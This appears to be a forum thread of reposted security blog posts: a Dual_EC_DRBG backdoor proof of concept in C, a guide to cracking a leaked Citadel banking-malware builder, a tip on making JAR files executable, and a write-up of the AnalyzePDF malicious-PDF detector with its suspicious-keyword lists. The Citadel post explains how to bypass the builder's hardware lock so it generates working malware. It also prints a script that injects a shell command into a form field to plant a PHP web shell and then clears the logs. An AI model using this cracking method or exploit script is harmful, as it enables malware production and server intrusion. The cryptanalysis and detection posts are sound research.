infinite number of pseudo-random sequences from a single seed, taken in the first step or after an explicit reseed. It is unfortunate that SP800-90A and the presentation from Microsoft use conflicting terminology (variable names). So I will use these variables: : Internal seed value. : External (output) value. You can also see in the document two functions: and . is a function that does a mapping between a large integer and binary data. It doesn’t do much, in fact we can happily ignore it. simply gets the X coordinate of a point, as the X and Y coordinates are mostly redundant (as we’re going to see later). If we unroll the inductive feedback loop on the first two generated outputs, we get this: output(30 least significant bytes of ) output(30 least significant bytes of ) [h=2]An attack[/h] Let’s begin working on and look if we can guess from its content. We can see that is the X coordinate of a point, with 16 bits missing (we lost the 2 most significant bytes in the output process). In a NIST GFp curve, There are for every value of X, zero, one or two points on the curve. So we have at most 17 bits of bruteforce to do to recover the original point A. Let’s work on the hypothesis that we know the point A and it is equal (by definition) to A = . Then the equation: but if we have a (secret) relation between P and Q such as with d = secret number (our backdoor !): multiplicating each side by d (replacing dQ with P) If you look carefully at the unrolled algorithm, you will notice that if we know we can calculate and we have all the required information to calculate subsequent and . All we need to do is to guess a value of A (based on a bruteforce approach), multiply it by the secret value d, then multiply the resulting scalar with Q, strip two bytes and publish the output. It is also very interesting that if we learn (in a practical attack) the first 32 bytes generated by this PRNG, the 30 first bytes give us candidates for A and the remaining two bytes can be used to validate our findings. If the X value had been output on 32 bytes, we would have an one over two chance of success because of the two coexisting points on same coordinate X. (Remember from high school, second degree equations can have two solutions). [h=2]Generating the constants[/h] As you have seen before, for our backdoor to work we need to choose the P and Q points in order to have the secret key to the backdoor. We have chosen to define P = dQ, however, that can’t work, because P is a generator for the EC group and its value has already been fixed. So, we have to find a value e such as Q = eP. This value can be calculated : (mult. by e) We need to find a value e such as ed = 1 for the curve C. The equation to resolve is where r is the order of the EC. The value of e is the inverse of d modulo r. We can then use that value to generate Q. /* 256 bits value randomly generated */unsigned char d[]= "\x75\x91\x67\x64\xbe\x30\xbe\x85\xd1\x50\x09\x19\x50\x8a\xf4\xb5" "\x7a\xc7\x09\x22\x07\x32\xae\x40\xac\x3e\xd5\xfe\x2e\x12\x25\x2a"; d_bn = BN_new(); assert(d_bn != NULL); BN_bin2bn(d, 32, d_bn); /* ensure d is well inside the group order */ EC_GROUP_get_order(curve, r, bn_ctx); BN_mod(d_bn, d_bn, r, bn_ctx); /* calculate Q = d * Generator + (NULL * NULL) */ ret = EC_POINT_mul(curve, my_Q, d_bn, NULL, NULL, bn_ctx); assert(ret == 1); /* calculate e = d^-1 (mod r) */ e_bn = BN_new(); assert(e_bn != NULL); /* invert d to get the value of e */ assert(NULL != BN_mod_inverse(e_bn, d_bn, r, bn_ctx)); (note: I know I mixed up e with d between the code and blog post but that doesn’t change anything at all.) [h=2]Implementation[/h] You can find the proof of concept code on my github. I’ll comment how it works: [h=3]Install OpenSSL/FIPS[/h] Most of the work needed for this POC actually was fighting with OpenSSL FIPS mode (getting it to compile at first) and finding the good APIs to use. OpenSSL FIPS and OpenSSL are two different software that share some codebase. I had to fetch a specific commit of OpenSSL FIPS (one that would compile) and patch it a little to have a few functions from Bignums usable from inside my application. I haven’t been able to mix FIPS and regular libcrypto, because of header incompatibilities (or a bug in my code I though was caused by incompatibilities). The README explains the steps to take (please read it). [h=3]Recover point A[/h] If you remember, we have the 30 least significant bytes of the X coordinate, that means we need to bruteforce our way into A point candidates. This can be easily done in a loop over the 2^16 possibilities. OpenSSL doesn’t provide any way of recovering a point from a single coordinate (there exists a point compression algorithm, but it is so badly patented that it’s not implemented anywhere). We have to resolve the curve’s equation: Resolving such an equation for y is not so different from the equation resolving you learned at high school: for (prefix = 0; prefix <= 0x10000 ; ++prefix){ x_bin[0] = prefix >> 8; x_bin[1] = prefix & 0xff; BN_bin2bn(x_bin, 32, x_value); //bnprint("X value", x_value); /* try to find y such as */ /* y^2 = x^3 - 3x + b (mod p) */ /* tmp1 = x^2 */ ret = BN_mod_mul(tmp1, x_value, x_value, &curve->field, bn_ctx); assert(ret == 1); ret = BN_set_word(tmp2, 3); assert(ret == 1); /* tmp1 = x^2 - 3 */ ret = BN_mod_sub(tmp1, tmp1, tmp2, &curve->field, bn_ctx); assert(ret == 1); /* tmp1 = (x^2 -3) * x */ ret = BN_mod_mul(tmp1, x_value, tmp1, &curve->field, bn_ctx); assert(ret == 1); /* tmp1 = x^3 - 3x + b */ ret = BN_mod_add(tmp1, tmp1, b_bn, &curve->field, bn_ctx); assert(ret == 1); //bnprint("Y squared", tmp1); if (NULL != BN_mod_sqrt(y_value, tmp1, &curve->field, bn_ctx)) { //printf("value %x match !\n", prefix); if(verbose) bnprint("calculated Y", y_value); BN_mod_sub(y_value, zero_value, y_value, &curve->field, bn_ctx); if(verbose) bnprint("calculated Y opposite", y_value); test_candidate(buffer + 30, x_value, y_value, bn_ctx); valid_points += 2; } } I mentioned that for every X, there were zero, one or two solutions: zero if the square root fails (not all elements of Z/pZ are quadratic residues), one if the result is 0 and two for all other answers. There are then two valid points and where is the opposite of the first value modulo p. Explanation (thanks Rod): [h=3]Recover PRNG state and generate next block[/h] This part is pretty straightforward. We import the estimated x and y values, verify that they are in the curve (they should !), then multiply that point with the secret value. We then multiply Q with the resulting scalar and we get 30 bytes of the next output. If the two first bytes match, we have successfully guessed the 28 remaining bytes. That attack can recover everything that’s output by that PRNG till a reseed. /* create the point A based on calculated coordinates x and y */ret = EC_POINT_set_affine_coordinates_GFp(curve, point, x, y, bn_ctx); assert(ret == 1); /* Normally the point should be on curve but we never know */ if (!EC_POINT_is_on_curve(curve, point, bn_ctx)) goto end; /* calculates i2 = phi(x(e.A)) */ ret = EC_POINT_mul(curve, point, NULL, point, e_bn, bn_ctx); assert(ret ==1); ret = EC_POINT_get_affine_coordinates_GFp(curve, point, i2x, NULL, bn_ctx); assert(ret ==1); if(verbose) bnprint ("i2_x", i2x); /* calculate o1 = phi(x(i2 * Q)) */ ret = EC_POINT_mul(curve, point, NULL, my_Q, i2x, bn_ctx); assert(ret == 1); ret = EC_POINT_get_affine_coordinates_GFp(curve, point, o1x, NULL, bn_ctx); if(verbose) bnprint ("o1_x", o1x); BN_bn2bin(o1x, o1x_bin); if (o1x_bin[2] == buffer[0] && o1x_bin[3] == buffer[1]){ printf("Found a match !\n"); bnprint("A_x", x); bnprint("A_y", y); print_hex("prediction", o1x_bin + 4, 28); } [h=3]Let’s run it ![/h] aris@kalix86:~/dualec$ ./dual_ec_drbg_poc s at start of generate: E9B8FBCFCDC7BCB091D14A41A95AD68966AC18879ECC27519403B34231916485 [omitted: many output from openssl] y coordinate at end of mul: 0663BC78276A258D2F422BE407F881AA51B8D2D82ECE31481DB69DFBC6C4D010 r in generate is: 96E8EBC0D507C39F3B5ED8C96E789CC3E6861E1DDFB9D4170D3D5FF68E242437 Random bits written: 000000000000000000000000000000000000000000000000000000000000 y coordinate at end of mul: 5F49D75753F59EA996774DD75E17D730051F93F6C4EB65951DED75A8FCD5D429 s in generate: C64EAF10729061418EB280CCB288AD9D14707E005655FDD2277FC76EC173125E [omitted: many output from openssl] PRNG output: ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437449e Found a match ! A_x: 96e8ebc0d507c39f3b5ed8c96e789cc3e6861e1ddfb9d4170d3d5ff68e242437 A_y: 0663bc78276a258d2f422be407f881aa51b8d2d82ece31481db69dfbc6c4d010 prediction: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3 Reviewed 65502 valid points (candidates for A) PRNG output: a3cbc223507c197ec2598e6cff61cab0d75f89a68ccffcb7097c09d3 Yikes ! [h=2]Conclusion[/h] It is quite obvious in light of the recent revelations from Snowden that this weakness was introduced by purpose by the NSA. It is very elegant and leaks its complete internal state in only 32 bytes of output, which is very impressive knowing it takes 32 bytes of input as a seed. It is obviously complete madness to use the reference implementation from NIST and I’m not the only one to be angry about it. You could use it with custom P and Q values, but that’s very seldom possible. Nevertheless having a whole EC point parameter leaked in the output makes it too easy to distinguish from real random and should never have been made into any specs at all. Let’s all bury that PRNG and the “security” companies bribed by NSA to enable backdoors by default for thirty silver coins. edits: fixed Dan Brown’s employer name, changed a variable name to avoid confusion, fixed counting error 28 bytes to 30 bytes note: I did not break the official algorithm. I do not know the secret value used to compute the Q constant, and thus cannot break the default implementation. Only NSA (and people with access to the key) can exploit the PRNG weakness. Sursa: Dual_Ec_Drbg backdoor: a proof of concept at Aris' Blog - Computers, ssh and rock'n roll
  20. [h=3]How the protection of Citadel got cracked[/h]Recently on a forum someone requested cbcs.exe (Citadel Backconnect Server) If you want to read more about the Backconnect on Citadel, the link that g4m372 shared is cool: Laboratorio Malware: Troyan Citadel BackConnect VNC Server Manager I've searched this file thought downloading a random mirror of the Citadel leaked package in hope to find it inside. Finally the file wasn't on the leaked archive but was already grabbed by various malware trackers. MD5: 50A59E805EEB228D44F6C08E4B786D1E Malwarebytes: Backdoor.Citadel.BkCnct And since i've downloaded the leaked Citadel package... let's see about the Builder. It can be interesting to make a post about it. Citadel.exe: a33fb3c7884050642202e39cd7f177e0 Malwarebytes: Hacktool.Citadel.Builder "ERROR: Builder has been moved to another PC or virtual environment, now it is deactivated." This file is packed with UPX: Same for the Citadel Backconnect Server and the Hardware ID generator. But when we try to unpack it via UPX we have an exception: UPX told us that there is something wrong with the file header, aquabox used a lame trick. With an hexadecimal editor we can clearly see that there is a problem with the DOS Header: We have 0x4D 0x5A ... 00 ... and a size of 0xE8 for the memory. e_lfanew is null, so let's fix it at 18h by 0x40 Miracle: Same tricks for the Hardware ID Calculator and the Citadel Backconnect Server, i will get back on these two files later. Now that we have a clear code we can know the Time/Date Stamp, view the ressources, but more interesting: see how Citadel is protected Viewing the strings already give us a good insight: PHYSICALDRIVE0, Win32_BIOS, Win32_Processor, SerialNumber... But we don't even really need to waste time trying to know how the generation is made. Although you can put a breakpoint at the beginning of the calculation procedure (0x4013F2) At the end, you will be here, this routine will finalise your HID: From another side, you can also have a look on the Hardware ID Calculator. I've got a problem with this file, the first layer was a SFX archive: Malware embedded (stealer): Conclusion: Don't rush on leaked stuff. Alright, now that you have extracted/unpacked the good HID Calculator you can open it in olly. The code is exactly the same as the one you can find on the Citadel Builder, it may help to locate the calculation procedure on the builder although it's really easy to locate it. That was just a short parentheses, to get back on the builder, after that the generation end you will have multiple occasions to view your HID on the stack like here: And the crutial part start here. When the Citadel package of Citab got leaked (see this article for more information) an important file was also released: The HID of the original machine who was running the builder, so you just have to replace your HID by this one, just like this: And this is how the protection of Citadel become super weak and can generate working malwares Now you just have to do a codecave or inject a dll in order to modify it permanently, child game. The problem that every crackers was facing on leaked Citadel builders is to find the good HID key. Citadel builders who was previously leaked wasn't leaked with HID key. e.g: vortex1772_second - 1.3.5.1 And you can't just 'force' the procedure to generate a bot because the Citadel stub is encrypted inside, that why when the package got leaked with the correct HID, a easy way to crack the builder appeared. Without having the good HID you can still bruteforce it till you break the key but this is much harder and time wasting, this solution would be also a more great achievement and respected in scene release. To finish, let's get back on the Citadel backconnect server who was requested on kernelmode.info This script was also leaked with the Citab package: It's for Windows box, and it's super secure... oh wait.. import urllib import urllib2 def request(url, params=None, method='GET'): if method == 'POST': urllib2.urlopen(url, urllib.urlencode(params)).read() elif method == 'GET': if params == None: urllib2.urlopen(url) else: urllib2.urlopen(url + '?' + urllib.urlencode(params)).read() def uploadShell(url, filename, payload): data = { 'b' : 'tapz', 'p1' : 'faggot', 'p2' : 'hacker | echo "' + payload + '" >> ' + filename } request(url + 'test.php', data) def shellExists(url): return urllib.urlopen(url).getcode() == 200 def cleanLogs(url): delete = { 'delete' : '' } request(URL + 'control.php', delete, 'POST') URL = 'http://localhost/citadel/winserv_php_gate/' FILENAME = 'shell.php' PAYLOAD = '<?php phpinfo(); ?>' uploadShell(URL, FILENAME, PAYLOAD) print '[~] Shell created!' if not shellExists(URL + FILENAME): print '[-]', FILENAME, 'not found...' else: print '[+] Go to:', URL + FILENAME cleanLogs(URL) print '[~] Logs cleaned!' Brief, happy new year guys Posted by Steven K at 14:28 Sursa: XyliBox: How the protection of Citadel got cracked
  21. [h=1]How to make a JAR file Linux executable[/h] Every Java programmer knows - or should known - that it is possible to create a runnable Java package archive (JAR), so that in order to launch an application it is enough to specify the jar file name on the Java interpreter command line along with the -jar parameter. For example: $ java -jar helloworld.jar There are plenty of tutorials showing how to implement this feature using Ant, Maven, Eclipse, Netbens, etc. Anyway in its basic form, it just requires to add a MANIFEST.MF file to the jar package. The manifest must contain an entry Main-Class that specifies which is the class defining the main method for your application. For example: $ javac HelloWorld.java $ echo Main-Class: HelloWorld > MANIFEST.MF $ jar -cvmf MANIFEST.MF helloworld.jar HelloWorld.class But this still requires your users to invoke the Java interpreter with the -jar option. There are many reasons why it would be preferable to have your app runnable by simply invoking it on the terminal shell like any other command. Here comes the protip! This technique it is based on the ability to append a generic binary payload to a Linux shell script. Read more about this here: Add a Binary Payload to your Shell Scripts | Linux Journal Taking advantage of this possibility the trick is just to embed a runnable jar file into a Bash script file. The script when executed will launch the Java interpreter specifying itself as the jar to run. Too complex? Much more easier to do in practice, than to explain! Let's say that you have a runnable jar named helloworld.jar Copy the Bash script below to a file named stub.sh #!/bin/sh MYSELF=`which "$0" 2>/dev/null` [ $? -gt 0 -a -f "$0" ] && MYSELF="./$0" java=java if test -n "$JAVA_HOME"; then java="$JAVA_HOME/bin/java" fi exec "$java" $java_args -jar $MYSELF "$@" exit 1 Than append the jar file to the saved script and grant the execute permission to the file resulting with the following command: cat stub.sh helloworld.jar > hello.run && chmod +x helloworld.run That's all! Now you can execute the app just typing helloworld.run on your shell terminal. The script is smart enough to pass any command line parameters to the Java application transparently. Cool! Isn't it ?! In the case your are a Windows guy, obviously this will not work (except you will run a Linux compatibility layer like Cygwin). Anyway exist tools that are able to wrap a Java application into a native Windows .exe binary file, producing a result similar to the one explained in this tutorial. See for example Launch4j - Cross-platform Java executable wrapper Sursa: https://coderwall.com/p/ssuaxa
  22. [h=3]AnalyzePDF - Bringing the Dirt Up to the Surface[/h] [h=2]What is that thing they call a PDF?[/h] The Portable Document Format (PDF) is an old format ... it was created by Adobe back in 1993 as an open standard but wasn't officially released as an open standard (SIO 32000-1) until 2008 - right @nullandnull ? I can't take credit for the nickname that I call it today, Payload Delivery Format, but I think it's clever and applicable enough to mention. I did a lot of painful reading through the PDF specifications in the past and if you happen to do the same I'm sure you'll also have a lot of "hm, that's interesting" thoughts as well as many "wtf, why?" thoughts. I truly encourage you to go out and do the same... it's a great way to learn about the internals of something, what to expect and what would be abnormal. The PDF has become a defacto for transferring files, presentations, whitepapers etc. <rant> How about we stop releasing research/whitepapers about PDF 0-days/exploits via a PDF file... seems a bit backwards</rant> We've all had those instances where you wonder if that file is malicious or benign ... do you trust the sender or was it downloaded from the Internet? Do you open it or not? We might be a bit more paranoid than most people when it comes to this type of thing and but since they're so common they're still a reliable means for a delivery method by malicious actors. As the PDF contains many 'features', these features often turn into 'vulnerabilities' (Do we really need to embed an exe into our PDF? or play a SWF game?). Good thing it doesn't contain any vulnerabilities, right? (to be fair, the sandboxed versions and other security controls these days have helped significantly) Adobe Acrobat Reader : CVE security vulnerabilities, versions and detailed reports [h=3]What does a PDF consist of?[/h] In its most basic format, a PDF consists of four components: header, body, cross-reference table (Xref) and trailer: (sick M$ Paint skillz, I know) If we create a simple PDF (this example only contains a single word in it) we can see a better idea of the contents we'd expect to see: [h=2]What else is out there?[/h] Since PDF files are so common these days there's no shortage of tools to rip them apart and analyze them. Some of the information contained in this post and within the code I'm releasing may be an overlap of others out there but that's mainly because the results of our research produced similar results or our minds think alike...I'm not going to touch on every tool out there but there are some that are worth mentioning as I either still use them in my analysis process or some of their functionality/lack of functionality is what sparked me to write AnalyzePDF. By mentioning the tools below my intentions aren't to downplay them and/or their ability to analyze PDF's but rather helping to show reasons I ended up doing what I did. [h=4]pdfid/pdf-parser[/h] Didier Stevens created some of the first analysis tools in this space, which I'm sure you're already aware of. Since they're bundled into distros like BackTrack/REMnux already they seem like good candidates to leverage for this task. Why recreate something if it's already out there? Like some of the other tools, it parses the file structure and presents the data to you... but it's up to you to be able to interpret that data. Because these tools are commonly available on distros and get the job done I decided they were the best to wrap around. Did you know that pdfid has a lot more capability/features that most aren't aware of? If you run it with the (-h) switch you'll see some other useful options such as the (-e) which display extra information. Of particular note here is the mention of "%%EOF", "After last %%EOF", create/mod dates and the entropy calculations. During my data gathering I encountered a few hiccups that I hadn't previously experienced. This is expected as I was testing a large data set of who knows what kind of PDF's. Again, I'm not noting these to put down anyone's tools but I feel it's important to be aware of what the capabilities and limitations of something are - and also in case anyone else runs into something similar so they have a reference. Because of some of these, I am including a slightly modified version of pdfid as well. I haven't tested if the newer version fixed anything so I'd rather give the files that I know work with it for everyone. I first experienced a similar error as mentioned here when using the (-e) option on a few files (e.g. - cbf76a32de0738fea7073b3d4b3f1d60). It appears it doesn't count multiple '%%EOF's since if the '%%EOF' is the last thing in the file without a '/r' or '/n' behind it, it doesn't seem to count it. I've had cases where the '/Pages' count was incorrect - there were (15) PDF's that showed '0' pages during my tests. One way I tried to get around this was to use the (-a) option and test between the '/Page' and '/Pages/ values. (e.g. - ac0487e8eae9b2323d4304eaa4a2fdfce4c94131) There were times when the number of characters after the last '%%EOF' were incorrect Won't flag on JavaScript if it's written like "<script contentType="application/x-javascript">" (e.g - cbf76a32de0738fea7073b3d4b3f1d60) : [h=4]peepdf[/h] Peepdf has gone through some great development over the course of me using it and definitely provides some great features to aid in your analysis process. It has some intelligence built into it to flag on things and also allows one to decode things like JavaScript from the current shell. Even though it has a batch/automated mode to it, it still feels like more of a tool that I want to use to analyze a single PDF at a time and dig deep into the files internals. Originally, this tool didn't look match keywords if they had spaces after them but it was a quick and easy fix... glad this testing could help improve another users work. [h=4]PDFStreamDumper[/h] PDFStreamDumper is a great tool with many sweet features but it has its uses and limitations like all things. It's a GUI and built for analysis on Windows systems which is fine but it's power comes from analyzing a single PDF at a time - and again, it's still mostly a manual process. [h=4]pdfxray/pdfxray_lite[/h] Pdfxray was originally an online tool but Brandon created a lite version so it could be included in REMnux (used to be publicly accessible but at the time of writing this looks like that might have changed). If you look back at some of Brandon's work historically he's also done a lot in this space as well and since I encountered some issues with other tools and noticed he did as well in the past I know he's definitely dug deep and used that knowledge for his tools. Pdfxray_lite has the ability to query VirusTotal for the file's hash and produce a nice HTML report of the files structure - which is great if you want to include that into an overall report but again this requires the user to interpret the parsed data [h=4]pdfcop[/h] Pdfcop is part of the Origami framework. There're some really cool tools within this framework but I liked the idea of analyzing a PDF file and alerting on badness. This particular tool in the framework has that ability, however, I noticed that if it flagged on one cause then it wouldn't continue analyzing the rest of the file for other things of interest (e.g. - I've had it close the file our right away if there was an invalid Xref without looking at anything else. This is because PDF's are read from the bottom up meaning their Xref tables are first read in order to determine where to go next). I can see the argument of saying why continue to analyze the file if it already was flagged bad but I feel like that's too much of tunnel vision for me. I personally prefer to know more than less...especially if I want to do trending/stats/analytics. [h=2]So why create something new?[/h] While there are a wealth of PDF analysis tools these days, there was a noticeable gap of tools that have some intelligence built into them in order to help automate certain checks or alert on badness. In fairness, some (try to) detect exploits based on keywords or flag suspicious objects based on their contents/names but that's generally the extent of it. I use a lot of those above mentioned tools when I'm in the situation where I'm handed a file and someone wants to know if it's malicious or not... but what about when I'm not around? What if I'm focused/dedicated to something else at the moment? What if there's wayyyy too many files for me to manually go through each one? Those are the kinds of questions I had to address and as a result I felt I needed to create something new. Not necessarily write something from scratch... I mean why waste that time if I can leverage other things out there and tweak them to fit my needs? [h=3]Thought Process[/h] What do people typically do when trying to determine if a PDF file is benign or malicious? Maybe scan it with A/V and hope something triggers, run it through a sandbox and hope the right conditions are met to trigger or take them one at a time through one of the above mentioned tools? They're all fine work flows but what if you discover something unique or come across it enough times to create a signature/rule out of so you can trigger on it in the future? We tend to have a lot to remember so doing the analysis one offs may result in us forgetting something that we previously discovered. Additionally, this doesn't scale too great in the sense that everyone on your team might not have the same knowledge that you do... so we need some consistency/intelligence built in to try and compensate for these things.< I felt it was better to use the characteristics of a malicious file (either known or observed from combinations of within malicious files) to eval what would indicate a malicious file. Instead of just adding points for every questionable attribute observed. e.g. - instead of adding a point for being a one page PDF, make a condition to say if you see an invalid xref and a one page PDF then give it a score of X. This makes the conditions more accurate in my eyes; since, for example: A single paged PDF by itself isn't malicious but if it also contains other things of question then it should have a heavier weight of being malicious. Another example is JavaScript within a PDF. While statistics show JavaScript within a PDF are a high indicator that it's malicious, there're still legitimate reasons for JavaScript to be within a PDF (e.g. - to calculate a purchase order form or verify that you correctly entered all the required information the PDF requires). [h=3]Gathering Stats[/h] At the time I was performing my PDF research and determining how I wanted to tackle this task I wasn't really aware of machine learning. I feel this would be a better path to take in the future but the way I gathered my stats/data was in a similar (less automated/cool AI) way. There's no shortage of PDF's out there which is good for us as it can help us to determine what's normal, malicious, or questionable and leverage that intelligence within a tool. If you need some PDF's to gather some stats on, contagio has a pretty big bundle to help get you started. Another resource is Govdocs from Digital Corpora ... or a simple Google dork. Note : Spidering/downloading these will give you files but they still need to be classified as good/bad for initial testing). Be aware that you're going to come across files that someone may mark as good but it actually shows signs of badness... always interesting to detect these types of things during testing! [h=4]Stat Gathering Process[/h] So now that I have a large set of files, what do I do now? I can't just rely on their file extensions or someone else saying they're malicious or benign so how about something like this: Verify it's a PDF file. When reading through the PDF specs I noticed that the PDF header can be within the first 1024 bytes of the file as stated in ""3.4.1, 'File Header' of Appendix H - ' Acrobat viewers require only that the header appear somewhere within the first 1024 bytes of the file.'"... that's a long way down compared to the traditional header which is usually right in the beginning of a file. So what's that mean for us? Well if we rely solely on something like file or TRiD they _might_ not properly identify/classify a PDF that has the header that far into the file as most only look within the first 8 bytes (unfair example is from corkami). We can compensate for this within our code/create a YARA rule etc.... you don't believe me you say? Fair enough, I don't believe things unless I try them myself either: The file to the left is properly identified as a PDF file but when I created a copy of it and modified it so the header was a bit lower, the tools failed. The PDF on the right is still in accordance with the PDF specs and PDF viewers will still open it (as shown)... so this needs to be taken into consideration. [*]Get rid of duplicates (based on SHA256 hash) for both files in the same category (clean vs. dirty) then again via the entire data set afterwards to make sure there're no duplicates between the clean and dirty sets. [*]Run pdfid & pdfinfo over the file to parse out their data. These two are already included in REMnux so I leveraged them. You can modify them to other tools but this made it flexible for me and I knew the tool would work when run on this distro; pdfinfo parsed some of the data better during tests so getting the best of both of them seemed like the best approach. [*]Run scans for low hanging fruit/know badness with local A/V||YARA Now that we have a more accurate data set classified: [*]Are all PDFs classified as benign really benign? [*]Are all PDFs classified as malicious really malicious? [h=3]Stats[/h] Files analyzed (no duplicates found between clean & dirty): [TABLE=width: 50%] [TR] [TH]Class[/TH] [TH]Type[/TH] [TH]Count[/TH] [/TR] [TR] [TD]Dirty[/TD] [TD]Pre-Dup[/TD] [TD]22,342[/TD] [/TR] [TR] [TD]Dirty[/TD] [TD]Post-Dup[/TD] [TD]11,147[/TD] [/TR] [TR] [TD]Clean[/TD] [TD]Pre-Dup[/TD] [TD]2,530[/TD] [/TR] [TR] [TD]Dirty[/TD] [TD]Post-Dup[/TD] [TD]2,529[/TD] [/TR] [TR] [TD=colspan: 2]Total Files Analyzed:[/TD] [TD]13,676[/TD] [/TR] [/TABLE] I've collected more than enough data to put together a paper or presentation but I feel that's been played out already so if you want more than what's outlined here just ping me. Instead of dragging this post on for a while showing each and every stat that was pulled I feel it might be more useful to show a high level comparison of what was detected the most in each set and some anomalies. [h=4]Ah-Ha's[/h] None of the clean files had incorrect file headers/versions There wasn't a single keyword/attribute parsed from the clean files that covered more than 4.55% of it's entire data set class. This helps show the uniqueness of these files vs. malicious actors reusing things. The dates within the clean files were generally unique while the date fields on the dirty files were more clustered together - again, reuse? None of the values for the keywords/attributes of the clean files were flagged as trying to be obfuscated by pdfid Clean files never had '/Colors > 2^24' above 0 while some dirty files did Rarely did a clean file have a high count of JavaScript in it while dirty files ranged from 5-149 occurrences per file '/JBIG2Decode' was never above '0' in any clean file '/Launch' wasn't used much in either of the data sets but still more common in the dirty ones Dirty files have far more characters after the last %%EOF (starting from 300+ characters is a good check) Single page PDF's have a higher likelihood of being malicious - no duh '/OpenAction' is far more common in malicious files [h=4]YARA signatures[/h] I've also included some PDF YARA rules that I've created as a separate file so you can use those to get started. YARA isn't really required but I'm making it that way for the time being because it's helpful... so I have the default rules location pointing to REMnux's copy of MACB's rules unless otherwise specified. Clean data set: Dirty data set: Signatures that triggered across both data sets: Cool... so we know we have some rules that work well and others that might need adjusting, but they still help! [h=4]What to look for[/h] So we have some data to go off of... what are some additional things we can take away from all of this and incorporate into our analysis tool so we don't forget about them and/or stop repetitive steps? Header In addition to being after the first 8 bytes I found it useful to look at the specific version within the header. This should normally look like "%PDF-M.N." where M.N is the Major/Minor version .. however, the above mentioned 'low header' needs to be looked for as well. Knowing this we can look for invalid PDF version numbers or digging deeper we can correlate the PDF's features/elements to the version number and flag on mismatches. Here're some examples of what I mean, and more reasons why reading those dry specs are useful: If FlateDecode was introduced in v1.2 then it shouldn't be in any version below If JavaScript and EmbeddedFiles were introduced in v1.3 then they shouldn't be in any version below If JBIG2 was introduced in v1.4 then it shouldn't be in any version below [*]Body This is where all of the data is (supposed to be) stored; objects (strings, names, streams, images etc.). So what kinds of semi-intelligent things can we do here? Look for object/stream mismatches. e.g - Indirect Objects must be represented by 'obj' and 'endobj' so if the number of 'obj' is different than the number of 'endobj' mentions then it might be something of interest Are there any questionable features/elements within the PDF? JavaScript doesn't immediately make the file malicious as mentioned earlier, however, it's found in ~90% of malicious PDF's based on others and my own research. '/RichMedia' - indicates the use of Flash (could be leveraged for heap sprays) '/AA', '/OpenAction', '/AcroForm' - indicate that an automatic action is to be performed (often used to execute JavaScript) '/JBIG2Decode', '/Colors' - could indicate the use of vulnerable filters; Based on the data above maybe we should look for colors with a value greater than 2^24 '/Launch', '/URL', '/Action', '/F', '/GoToE', '/GoToR' - opening external programs, places to visit and redirection games Obfuscation Multiple filters ('/FlateDecode', '/ASCIIHexDecode', '/ASCII85Decode', '/LZWDecode', '/RunLengthDecode') The streams within a PDF file may have filters applied to them (usually for compressing/encoding the data). While this is common, it's not common within benign PDF files to have multiple filters applied. This behavior is commonly associated with malicious files to try and thwart A/V detection by making them work harder. Separating code over multiple objects Placing code in places it shouldn't be (e.g. - Author, Keywords etc.) White space randomization Comment randomization Variable name randomization String randomization Function name randomization Integer obfuscation Block randomization Any suspicious keywords that could mean something malicious when seen with others? eval, array, String.fromCharCode, getAnnots, getPageNumWords, getPageNthWords, this.info, unescape, %u9090 [*]Xref The first object has an ID 0 and always contains one entry with generation number 65535. This is at the head of the list of free objects (note the letter ‘f’ that means free). The last object in the cross reference table uses the generation number 0. Translation please? Take a look a the following Xref: Knowing how it's supposed to look we can search for Xrefs that don't adhere to this structure. [*]Trailer Provides the offset of the Xref (startxref) Contains the EOF, which is supposed to be a single line with "%%EOF" to mark the end of the trailer/document. Each trailer will be terminated by these characters and should also contain the '/Prev' entry which will point to the previous Xref. Any updates to the PDF usually result in appending additional elements to the end of the file This makes it pretty easy to determine PDF's with multiple updates or additional characters after what's supposed to be the EOF [*]Misc. Creation dates (both format and if a particular one is known to be used) Title Author Producer Creator Page count [h=2]The Code[/h] So what now? We have plenty of data to go on - some previously known, but some extremely new and helpful. It's one thing to know that most files with JavaScript or that are (1) page have a higher tendency of being malicious... but what about some of the other characteristics of these files? By themselves, a single keyword/attribute might not stick out that much but what happens when you start to combine them together? Welp, hang on because we're going to put this all together. [h=3]File Identification[/h] In order to account for the header issue, I decided the tool itself would look within the first 1024 bytes instead of relying on other file identification tools: Another way, so this could be detected whether this tool was used or not, was to create a YARA rule such as: [h=3]Wrap pdfinfo[/h] Through my testing I found this tool to be more reliable in some areas as opposed to pdfid such as: Determining if there're any Xref errors produced when trying to read the PDF Look for any unterminated hex strings etc. Detecting EOF errors [h=3]Wrap pdfid[/h] Read the header. *pdfid will show exactly what's there and not try to convert it* _attempt_ to determine the number of pages Look for object/stream mismatches Not only look for JavaScript but also determine if there's an abnormally high amount Look for other suspicious/commonly used elements for malicious purposes (AcroForm, OpenAction, AdditionalAction, Launch, Embedded files etc.) Look for data after EOF Calculate a few different entropy scores Next, perform some automagical checks and hold on to the results for later calculations. [h=3]Scan with YARA[/h] While there are some pre-populated conditions that score a ranking built into the tool already, the ability to add/modify your own is extremely easy. Additionally, since I'm a big fan of YARA I incorporated it into this as well. There're many benefits of this such as being able to write a rule for header evasion, version number mismatching to elements or even flagging on known malicious authors or producers. The biggest strength, however, is the ability to add a 'weight' field in the meta section of the YARA rules. What this does is allow the user to determine how good of a rule it is and if the rule triggers on the PDF, then hold on to its weighted value and incorporate it later in the overall calculation process which might increase it's maliciousness score. Here's what the YARA parsing looks like when checking the meta field: And here's another YARA rule with that section highlighted for those who aren't sure what I'm talking about: If the (-m) option is supplied then if _any_ YARA rule triggers on the PDF file it will be moved to another directory of your choosing. This is important to note because one of your rules may hit on the file but it may not be displayed in the output, especially if it doesn't have a weight field. Once the analysis has completed the calculation process starts. This is two phase - Anything noted from pdfino and pdfid are evaluated against some pre-determined combinations I configured. These are easy enough to modify as needed but they've been very reliable in my testing...but hey, things change! Instead of moving on once one of the combination sets is met I allow the scoring to go through each one and add the additional points to the overall score, if warranted. This allows several 'smaller' things to bundle up into something of interest rather than passing them up individually. Any YARA rule that triggered on the PDF file has it's weighted value parsed from the rule and added to the overall score. This helps bump up a files score or immediately flag it as suspicious if you have a rule you really want to alert on. So what's it look like in action? Here's a picture I tweeted a little while back of it analyzing a PDF exploiting CVE-2013-0640 : [h=3]Download[/h] I've had this code for quite a while and haven't gotten around to writing up a post to release it with but after reading a former coworkers blog post last night I realized it was time to just write something up and get this out there as there are still people asking for something that employs some of the capabilities (e.g. - weight ranking). Is this 100% right all the time? No... let's 